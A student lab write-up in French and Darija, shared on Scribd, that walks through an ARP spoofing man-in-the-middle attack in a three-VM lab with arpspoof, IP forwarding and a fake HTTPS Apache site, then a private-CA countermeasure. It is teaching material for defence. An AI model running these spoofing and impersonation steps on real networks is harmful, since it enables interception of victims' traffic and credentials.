Scribd
Importer
19 vues10 pages

Lab5a - ARP Spoofing

Le document explique le protocole ARP et les attaques ARP spoofing, où un attaquant peut rediriger le trafic d'une victime en falsifiant des informations ARP. Il décrit également un laboratoire pratique pour créer un faux site HTTPS et mener une attaque ARP spoofing, suivi de la mise en place de contre-mesures pour sécuriser le serveur. Les étapes incluent la configuration de serveurs, l'installation de certificats SSL, et des tests pour vérifier la sécurité des connexions.

Transféré par

asmaa9nouali
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd
19 vues10 pages

Lab5a - ARP Spoofing

Le document explique le protocole ARP et les attaques ARP spoofing, où un attaquant peut rediriger le trafic d'une victime en falsifiant des informations ARP. Il décrit également un laboratoire pratique pour créer un faux site HTTPS et mener une attaque ARP spoofing, suivi de la mise en place de contre-mesures pour sécuriser le serveur. Les étapes incluent la configuration de serveurs, l'installation de certificats SSL, et des tests pour vérifier la sécurité des connexions.

Transféré par

asmaa9nouali
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

1.

​blahblah to explain ( u can skip it ):

●​ ARP c un protocole qui sert à lier une adresse IP à une adresse MAC dans un LAN.
Reminder :
➨ les adresses MAC sont des adr tae la couche 2 donc they’re useful ghir dakhel les
LAN w maytroutawsh, w pr la communication entre LAN yak on utilise l’MAC tae
l’gateway.

●​ L’ARP spoofing ( ou poisoning ), c un type des attaques MitM, c quand un attaquant


envoie de fausses infos ARP pour se faire passer pour la passerelle (ou une autre
machine), bach yweli y9der yrediriger le trafic d’une victime vers lui.
Scénario:
-​ Machine A (IP: [Link], MAC: [Link]) veut communiquer
avec la Machine B (IP: [Link], MAC: [Link]) via l’gateway
de l’entreprise, qui est à l'adresse IP [Link].
-​ Machine A maendhach l'adr MAC tae l’gateway, donc elle envoie une requête
ARP sur le LAN pour trouver l'adresse MAC associée à [Link]
-​ L’gateway répond : "I’m [Link] et mon adr MAC c [Link]"
-​ The attacker (Machine C, IP: [Link]) se trouve sur le mm LAN et capture
cette requête ARP.
-​ C envoie ensuite une fausse réponse ARP à la machine A, pretending beli son
adresse MAC hiya tae l’gateway ( "I’m [Link], mon adr MAC est
[Link]").
-​ Ayaaa A tweli tbeat koulsh l C, donc C pourra intercepter, modifier, ou
simplement rediriger le trafic de Machine A. The attacker can listen berk sans
rien faire (sniffing), il peut aussi récupérer des infos sensibles comme des
identifiants, des mots de passe, ou toute autre donnée circulant sur le réseau.

●​ Même si la victime tconnecti à un site en HTTPS (qui normalement sécurise la


connexion), un attaquant peut intercepter ou manipuler les données s'il arrive à se
placer entre la victime et le serveur (MitM attack ). Il peut usurper l'identité du site en
utilisant de faux certificats SSL, trompant ainsi la victime, qui pense toujours être
connectée en toute sécurité au site légitime.

●​ Du coup f had le lab on va :


-​ Créer un faux site avec HTTPS.
-​ Lancer une attaque ARP spoofing pour détourner le trafic.
-​ Et voir quelles protections on peut mettre en place pour éviter ça.
2 . Environnement du TP:

➨ les 3 machines sont sur le même réseau local.

Ps: avant de commencer bch yemchou les tests m firefox

1.​ rouh l redhat execute :

sudo firewall-cmd --permanent --add-service=https

sudo firewall-cmd --reload

( ena par défaut lfirewall makanetch yautorisili le port 443 tae https )

2.​ rouh l debian execute:

nano /etc/hosts

tu ajoutes mea lkhr la ligne : [Link] [Link]

ip_redhat [Link]

3. Mise en place du serveur Web légitime:


Steps:
1.​ sur redhat, installer apache avec support SSL:

yum install httpd mod_ssl -y

2.​ activer SSL avec un certificat auto-signé :


openssl req -new -x509 -days 365 -nodes -out /etc/pki/tls/certs/[Link]
-keyout /etc/pki/tls/private/[Link]

nom commun = [Link]

3.​ Configure Apache pour utiliser le certificat :

nano /etc/httpd/conf.d/[Link]

SSLCertificateFile /etc/pki/tls/certs/[Link]
SSLCertificateKeyFile /etc/pki/tls/private/[Link]
4.​ créer un fichier [Link]:

echo "Ceci est le site [Link] légitime" | tee /var/www/html/[Link]

5.​ lancer apache :

systemctl start httpd

systemctl enable httpd

6.​ depuis Debian, ouvre firefox et cherche:

[Link]

-​ Le navigateur affichera une alerte de certificat psq’il est auto-signé ( machi validé par
une autorité de certification reconnue )

-​ On accepte l'exception:
4. Attaque ARPspoof :
Steps:

1.​ installer dsniff sur Kali :

apt update && apt install dsniff -y

2.​ activer l’IP forwarding sur Kali:

echo 1 | tee /proc/sys/net/ipv4/ip_forward

3.​ Lancer l’attaque ARP Spoofing :

arpspoof -t ip_victime ip_serveur(redhat)

Nkheliweh yrunni flbackground, 7el tab jdida pour la suite

5. Détourner le trafic sur Kali (faux serveur):


Steps:

1.​ Créer une interface virtuelle avec l’IP du serveur légitime

ifconfig eth0:0 [Link] up


(it’s ifconfig eth0:0 ip_redhat up berk ena r9dt w ndt redemarit redhat tbdlt l’adr ip tae
ens34 m [Link] l [Link])

2.​ Installer Apache et SSL

sudo apt install apache2 openssl -y

sudo a2enmod ssl

3.​ Générer un certificat auto-signé:

openssl req -x509 -nodes -days 365 -newkey rsa:2048 \

-keyout /etc/ssl/private/[Link] \

-out /etc/ssl/certs/[Link]

4.​ Configurer Apache pour HTTPS :

nano /etc/apache2/sites-available/[Link]

copy paste hada fih :

<VirtualHost *:443>

ServerName [Link]

DocumentRoot /var/www/html

SSLEngine on

SSLCertificateFile /etc/ssl/certs/[Link]

SSLCertificateKeyFile /etc/ssl/private/[Link]

</VirtualHost>

5.​ Créer la page piégée:

echo "U were hacked" | tee /var/www/html/[Link]

ay matbahdlnach dir vous avez été hacké kima aw dayrha menacer hh

6.​ Activer le site et redémarrer Apache


a2ensite [Link]

systemctl restart apache2

TEST:
rouh l debian -> firefox -> [Link]

6. Contre-mesures:
Steps:

1.​ sur redhat on crée l’autorité:

mkdir ~/CA && cd ~/CA

openssl genrsa -out [Link] 2048

openssl req -x509 -new -nodes -key [Link] -sha256 -days 1024 -out [Link]

2.​ signer un certificat pour le serveur:


openssl genrsa -out [Link] 2048

openssl req -new -key [Link] -out [Link]

openssl x509 -req -in [Link] -CA [Link] -CAkey [Link] -CAcreateserial -out
[Link] -days 365 -sha256

3.​ configurer apache pour utiliser ce certificat :

d’abord bch nassuriw que les fichiers rahoum f le bon endroit ncopyiwhm f les dossiers
standard tae apache ( au cas ou ):

cp [Link] /etc/pki/tls/certs/

cp [Link] /etc/pki/tls/private/

cp [Link] /etc/pki/tls/certs/

then execute :

sudo nano /etc/httpd/conf.d/[Link]

et tu modifies les lignes ( ida l9it ksh ligne commentée ne7i # ) :


SSLCertificateFile /etc/pki/tls/certs/[Link]

SSLCertificateKeyFile /etc/pki/tls/private/[Link]

SSLCertificateChainFile /etc/pki/tls/certs/[Link]

4.​ sur debian nzidou la CA l firefox:


●​ ouvrir firefox → settings → privacy & security → certificates → view certificates.

●​ importer [Link] ( la ca li creyinaha f redhat ) :

ena 7elit lmail f redhat beat fichier [Link] l rouhi w recupiritou m debian :p

Test Final
1.​ Arrêter l'Attaque : Retournez sur la machine Kali et arrêtez le processus arpspoof (Ctrl+C
dans le terminal où il s'exécute).
2.​ Vider le Cache ARP (Debian) : Assurez-vous que la table ARP de la victime n'est plus
corrompue:
well nrmlmnt ndirou arp -d <ip_redhat> buuuuuuuuuut menace cm d’hab ykhelilna swalh li are
no longer supported :p so instead execute

sudo ip neigh del ip_redhat dev interface_tae_debian_li_rahi_flemm_res


genre execute ip a sur debian recupiri asm l’interface w execute
ex : sudo ip neigh del [Link] dev ens33

3.​ Accès Normal (Debian) :


●​ Fermez et rouvrez Firefox ou videz le cache si nécessaire.
●​ Accédez à [Link]
●​ Le site légitime devrait maintenant se charger sans avertissement de sécurité, car le
certificat [Link] est signé par une CA ([Link]) que Firefox reconnaît maintenant
comme fiable. Vous verrez peut-être encore l'icône du cadenas, indiquant une connexion
sécurisée validée par votre CA.

1.​ Relancer l'Attaque (Kali) :


○​ Réexécutez la commande sudo arpspoof -t <ip_victime> <ip_serveur> sur
Kali.
2.​ Tester l'Accès Pendant l'Attaque (Debian) :
○​ Essayez à nouveau d'accéder à [Link]
○​ Cette fois-ci, l'attaque redirige vers Kali, qui présente son certificat [Link]. Comme
ce certificat n'est pas signé par la CA de confiance ([Link]), Firefox devrait afficher
une erreur de sécurité majeure (différente de l'avertissement initial pour certificat
auto-signé) ou bloquer complètement la connexion. Il ne devrait plus vous proposer
simplement "d'accepter le risque", car l'émetteur du certificat est inconnu et non
approuvé.
○​

Vous aimerez peut-être aussi